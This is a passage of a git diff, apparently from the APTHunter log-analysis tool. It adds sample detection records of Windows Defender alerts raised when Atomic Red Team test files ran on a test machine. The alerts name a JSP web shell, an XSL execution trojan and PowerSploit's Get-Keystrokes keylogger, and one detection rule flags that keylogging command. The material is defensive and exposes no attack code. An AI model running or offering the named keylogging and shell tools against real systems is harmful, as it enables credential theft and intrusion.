+ AM: 1.1.16100.4, NIS: 1.1.16100.4
+
+",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational
+Windows Defender Found Malware,1563482477.508276,2019-07-19T00:41:17.508276+04:00,,Threat,Critical,"Windows Defender Found Malware - details : Severity ( High ) , Name ( HackTool:JS/Jsprat ) , Catgeory ( Tool ) , Path ( file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0005) ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( ) ",1116,"
+
+
+
+
+ 1116
+ 0
+ 3
+ 0
+ 0
+ 0x8000000000000000
+
+
+ 75
+
+
+
+
+ Microsoft-Windows-Windows Defender/Operational
+ MSEDGEWIN10
+
+
+
+
+ %%827
+ 4.18.1906.3
+ {37522D93-EBDD-4A5B-93B6-E984C9E3FD38}
+ 2019-07-18T20:40:16.697Z
+
+
+ 2147708292
+ HackTool:JS/Jsprat
+ 4
+ High
+ 34
+ Tool
+ https://go.microsoft.com/fwlink/?linkid=37020&name=HackTool:JS/Jsprat&threatid=2147708292&enterprise=0
+ 1
+
+ 1
+ 3
+ %%818
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ MSEDGEWIN10\IEUser
+
+ file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0005)
+ 1
+ %%845
+ 1
+ %%813
+ 8
+ %%862
+ 0
+ 9
+ %%887
+
+ 0x00000000
+ The operation completed successfully.
+
+ 0
+ 0
+ No additional actions required
+
+
+ AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 1.297.1333.0
+ AM: 1.1.16100.4, NIS: 1.1.16100.4
+
+",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational
+Windows Defender Found Malware,1563482475.439635,2019-07-19T00:41:15.439635+04:00,,Threat,Critical,"Windows Defender Found Malware - details : Severity ( Severe ) , Name ( Trojan:XML/Exeselrun.gen!A ) , Catgeory ( Trojan ) , Path ( file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1086\payloads\test.xsl ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( ) ",1116,"
+
+
+
+
+ 1116
+ 0
+ 3
+ 0
+ 0
+ 0x8000000000000000
+
+
+ 48
+
+
+
+
+ Microsoft-Windows-Windows Defender/Operational
+ MSEDGEWIN10
+
+
+
+
+ %%827
+ 4.18.1906.3
+ {8791B1FB-0FE7-412E-B084-524CB5A221F3}
+ 2019-07-18T20:40:13.775Z
+
+
+ 2147735426
+ Trojan:XML/Exeselrun.gen!A
+ 5
+ Severe
+ 8
+ Trojan
+ https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:XML/Exeselrun.gen!A&threatid=2147735426&enterprise=0
+ 1
+
+ 1
+ 3
+ %%818
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ MSEDGEWIN10\IEUser
+
+ file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1086\payloads\test.xsl
+ 1
+ %%845
+ 1
+ %%813
+ 2
+ %%823
+ 0
+ 9
+ %%887
+
+ 0x00000000
+ The operation completed successfully.
+
+ 0
+ 0
+ No additional actions required
+
+
+ AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 1.297.1333.0
+ AM: 1.1.16100.4, NIS: 1.1.16100.4
+
+",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational
+Suspicious Command or process found in the log,1563482402.281388,2019-07-19T00:40:02.281388+04:00,,Threat,Critical,Found a log contain suspicious powershell command ( Get-Keystrokes),1116,"
+
+
+
+
+ 1116
+ 0
+ 3
+ 0
+ 0
+ 0x8000000000000000
+
+
+ 37
+
+
+
+
+ Microsoft-Windows-Windows Defender/Operational
+ MSEDGEWIN10
+
+
+
+
+ %%827
+ 4.18.1906.3
+ {511224D4-1EB4-47B9-BC4A-37E21F923FED}
+ 2019-07-18T20:40:00.580Z
+
+
+ 2147725349
+ Trojan:PowerShell/Powersploit.M
+ 5
+ Severe
+ 8
+ Trojan
+ https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:PowerShell/Powersploit.M&threatid=2147725349&enterprise=0
+ 1
+
+ 1
+ 3
+ %%818
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ MSEDGEWIN10\IEUser
+
+ file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1056\Get-Keystrokes.ps1
+ 1
+ %%845
+ 1
+ %%813
+ 0
+ %%822
+ 0
+ 9
+ %%887
+
+ 0x00000000
+ The operation completed successfully.
+
+ 0
+ 0
+ No additional actions required
+
+
+ AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 1.297.1333.0
+ AM: 1.1.16100.4, NIS: 1.1.16100.4
+
+",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational
+Windows Defender Found Malware,1563482402.281388,2019-07-19T00:40:02.281388+04:00,,Threat,Critical,"Windows Defender Found Malware - details : Severity ( Severe ) , Name ( Trojan:PowerShell/Powersploit.M ) , Catgeory ( Trojan ) , Path ( file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1056\Get-Keystrokes.ps1 ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( ) ",1116,"
+
+
+
+
+ 1116
+ 0
+ 3
+ 0
+ 0
+ 0x8000000000000000
+
+
+ 37
+
+
+
+
+ Microsoft-Windows-Windows Defender/Operational
+ MSEDGEWIN10
+
+
+
+
+ %%827
+ 4.18.1906.3
+ {511224D4-1EB4-47B9-BC4A-37E21F923FED}
+ 2019-07-18T20:40:00.580Z
+
+
+ 2147725349
+ Trojan:PowerShell/Powersploit.M
+ 5
+ Severe
+ 8
+ Trojan
+ https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:PowerShell/Powersploit.M&threatid=2147725349&enterprise=0
+ 1
+
+ 1
+ 3
+ %%818
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ MSEDGEWIN10\IEUser
+
+ file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1056\Get-Keystrokes.ps1
+ 1
+ %%845
+ 1
+ %%813
+ 0
+ %%822
+ 0
+ 9
+ %%887
+
+ 0x00000000
+ The operation completed successfully.
+
+ 0
+ 0
+ No additional actions required
+
+
+ AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 1.297.1333.0
+ AM: 1.1.16100.4, NIS: 1.1.16100.4
+
+",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational
diff --git a/source/screenshot/APTHunter-Allreport.png b/source/screenshot/APTHunter-Allreport.png
new file mode 100644
index 0000000..225ecf5
Binary files /dev/null and b/source/screenshot/APTHunter-Allreport.png differ
diff --git a/source/screenshot/APTHunter-Excel.png b/source/screenshot/APTHunter-Excel.png
new file mode 100644
index 0000000..4db713f
Binary files /dev/null and b/source/screenshot/APTHunter-Excel.png differ
diff --git a/source/screenshot/APTHunter-Help.png b/source/screenshot/APTHunter-Help.png
new file mode 100644
index 0000000..c5a495b
Binary files /dev/null and b/source/screenshot/APTHunter-Help.png differ
diff --git a/source/screenshot/APTHunter-Timeline-Explorer.png b/source/screenshot/APTHunter-Timeline-Explorer.png
new file mode 100644
index 0000000..85b7d8f
Binary files /dev/null and b/source/screenshot/APTHunter-Timeline-Explorer.png differ
diff --git a/source/screenshot/APTHunter-output.png b/source/screenshot/APTHunter-output.png
new file mode 100644
index 0000000..2ce4dd0
Binary files /dev/null and b/source/screenshot/APTHunter-output.png differ